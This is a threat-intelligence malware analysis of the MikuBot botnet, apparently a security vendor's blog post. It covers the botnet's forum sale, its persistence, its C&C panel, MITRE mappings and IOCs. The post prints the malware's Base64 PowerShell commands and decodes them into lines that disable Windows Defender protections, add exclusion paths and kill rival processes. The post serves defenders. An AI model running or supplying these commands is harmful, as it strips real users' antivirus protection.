New Botnet Spies on Victims Using Hidden VNC
During a routine threat-hunting exercise, Cyble Research Labs came across a new malware bot named “MikuBot” in a cyber-crime forum. Mikubot is a malicious bot that steals sensitive data and launches hidden VNC sessions that allow the TA (Threat Actor) to access the victim’s machine remotely, spread through USB, and download and execute other malware.
The bot is written in C++ and works on operating systems ranging from Windows Vista to Windows 11. According to the TA’s post, the malware is standalone and does not require any dependencies to run. Additionally, the TA provides full software support, consultation, new features, crypts, and responsive administration for MikuBot.
The TA has also mentioned in the post that the malware uses encrypted strings, dynamic API functions, unique object names, anti-emulation methods, and tricks to evade detection by antivirus products.
The figure below shows the TA’s MikuBot advertisement on a cybercrime forum with price and feature details.
The TA sells MikuBot with Panel for these (temporary) prices, as listed below:
- $ 1300 (1.5 months)
- $ 2200 (3 months)
The TA has claimed that the bot and panel have the following features in their post.
Technical Details
We have taken the below sample hash for our analysis:
(SHA256), 9d98af7edc7ef9cc5dfc258f11b1795b3ecb74aa613cc14212102d75bbdc8c44,
which is a 32-bit executable file compiled with Microsoft Visual C/C++ compiler.
The malware file contains the encrypted payload embedded in the RCData of the resource section. Upon execution, the malware file loads the encrypted payload from the resource section and decrypts it.
The below figure shows the UPX packed payload decrypted from resource “RCData”.
Then, the malware loads the UPX payload and executes it in the memory, as shown below.
Then, the malware unpacks the code in memory and creates a mutex named “CBB536F139732610633691” to ensure that only one instance of malware is running on the victim’s system at any given time.
Next, the malware creates a folder with mutex name in %appdata% location, copies itself using the same name inside the folder, and hides both, as shown below.
After that, it creates a task-scheduler entry with this mutex name, which executes the malware every 10 minutes.
Additionally, the malware drops an internet shortcut file inside the start-up folder to establish auto-launch capability during system restarts.
Upon executing the self-copy file, it launches two PowerShell instances by using the ShellExecuteW() API function with the following Base64 encoded commands.
- powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwAiAA==”
- powershell -Enc KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0AZgBpAGwAdABlAHIAIAAiAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAGwAaQBrAGUAIAAnACUAZABvAG4AYQB0AGUALQBsAGUAdgBlAGwAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAGYAaQBsAHQAZQByACAAIgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIABsAGkAawBlACAAJwAlAGMAdQBkAGEAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQA=”
The first PowerShell instance executes the following commands to disable the Windows Defender’s controlled folder access and potentially unwanted application protection.
Additionally, it adds the %appdata% folder path into Windows Defender’s exclusion list.
- Set-MpPreference -EnableControlledFolderAccess Disabled
- Set-MpPreference -PUAProtection disable
- Add-MpPreference -ExclusionPath “$env:userprofile\AppData\Roaming”
The second PowerShell instance runs the below WMI queries, which terminates the competitors’ miners and bots by checking the strings such as “donate-level” and “cuda” in the command line parameters of the running processes.
- (Get-WmiObject Win32_Process -filter “CommandLine like ‘%donate-level%'”).Terminate()
- (Get-WmiObject Win32_Process -filter “CommandLine like ‘%cuda%'”).Terminate()
The malware then tries to detect the presence of a virtual environment, debugger and antivirus tools by using strings and DLL modules.
Finally, the malware collects the victim’s sensitive information and sends it to the C&C server by using the below URL:
- 136.144.41[.]244/panel/gate.php?CBB536F13973261063369
The below figure shows the code snippet used by the malware for sending the stolen information to its C&C server.
The Bot can also perform additional tasks such as spreading via USB, downloading/executing other malware, and launching a Hidden Virtual Network Computing (HVNC) session with the ability to bypass NAT and update/remove the bot from the victim’s machine.
C&C Panel: MIKUBOT
Here are some screenshots that showcase the control panel of MikuBot.
The login page of MikuBot is shown below.
The figure below shows the home page of the MikuBot panel, which demonstrates the bot’s status and operating system along with the region.
The bot menu shows the list of bots that are connected to the C&C server along with the details such as status, UID, IP, country, Windows version, and first/last seen date, as shown below.
The figure below shows the Tasks menu where TA can create a new HNVC task using details such as Bot ID, country code, and IP.
The below figure shows the convenient settings panel, which allows the TA to change the login and database credentials, modify the timeout, etc.
Conclusion
Many cybercriminals purchase malware and add-on services from underground forums to carry out financial fraud without requiring a specific skill set. The sale of malware bots and services has placed individuals and entities at a greater risk of cyber-attacks and financial fraud.
The TAs behind MikuBot are highly active with limited functionalities at the moment. However, they are evolving their methods, and we can expect to see more sophisticated variants of MikuBot in the future. Cyble Research Labs will continue to monitor MikuBot developments and keep our readers aware and informed.
Our Recommendations
- Avoid downloading files from untrusted sources.
- Clear browsing history and reset passwords at regular intervals.  
- Turn on the automatic software update feature on your computer, mobile, and other connected devices. 
- Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop, and mobile. 
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.  
- Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs. 
- Block URLs that could be used to spread the malware, e.g., Torrent/Warez. 
- Monitor the beacon on the network level to block data exfiltration by malware or TAs. 
- Enable Data Loss Prevention (DLP) Solution on the employees’ systems. 
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| Execution | T1204 T1059 | User Execution Command and Scripting Interpreter |
| Defense Evasion | T1497 T1027 | Virtualization/Sandbox Evasion Software Packing |
| Persistence | T1053 T1547 | Scheduled Task/Job Registry Run Keys / Startup Folder |
| Discovery | T1082 | System Information Discovery |
| Collection | T1005 | Data from Local System |
| CNC | T1071 | Application Layer Protocol |
Indicator Of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| eab9c8aeeed4be3d8802ad9849fe6b93 a1d352239f3c2b005c3ea0736eecedea5db92821 9d98af7edc7ef9cc5dfc258f11b1795b3ecb74aa613cc14212102d75bbdc8c44 | MD5 SHA1 Sha256 | MikuBot exe |
| ca9aa4c6fde16d57e94b119cc399a668 2a013d2c21b9157025653add9310ec44257e6499 5afcf2affa6b7fd9018724b0d0547ebf3151b004c2daaf4aa5149d589bb4dff7 | MD5 SHA1 Sha256 | MikuBot exe |
| 7fec36c6ceba69525848b9eaaf85307f 199f6c1b8effdd087c0f7ac85b4fee976826de7c 73865a87ccbba39258ac07f9e0606df31aebc510aa2e7b437fc8a9fcdd1d55a3 | MD5 SHA1 Sha256 | MikuBot exe |
| c51f9796867da3ff980535a0e2516bec 681317aff2fc33e23bcc42c1eac3e2c4e69691cd 8aab180f8a8ad2351ab4e93c09e84cf27b3b7f0ebfdf34fbe341c2ab8a99a16a | MD5 SHA1 Sha256 | MikuBot exe |
| c20b29f54755d2bc04e44baa800b9a7d 0dcda234dd568a4080322ed10a36b5c0af8a8827 d2221c20900d9aebbd0d19bf17ad41483e7453ad190d07b4f6d5b9dc213d3224 | MD5 SHA1 Sha256 | MikuBot exe |
| 4007430207efa37a386e74a669d210c7 1c717bfb62106470c06969daf3d2fe697cbd88f7 5416d7c012d4a0cfb50d068e9660be9724fa128c175b018f14a4f05c1e3b7b64 | MD5 SHA1 Sha256 | MikuBot exe |
| 5aedea35488b7786fe31b7e8ba029a76 c2601dee06e586cfac8e7a48ab69aa76f421af19 6a540c56ddd2715f68bb87455cc894ec5d314d4dca97013e83d7fd9fc47302b8 | MD5 SHA1 Sha256 | MikuBot exe |
| 0764d1b4ecdba14cc700dfa5c3aa0058 73ee1688ca98002c2fc90d6ef1b41e675c5bcb22 39728194d4c182d2e158686ba4c402f5d46c3dabe9538a09ff8dd2bc481ecc88 | MD5 SHA1 Sha256 | MikuBot UPX packed exe |
| 136.144.41[.]244/panel/gate.php?CBB536F139732610633691 | URL | C&C |
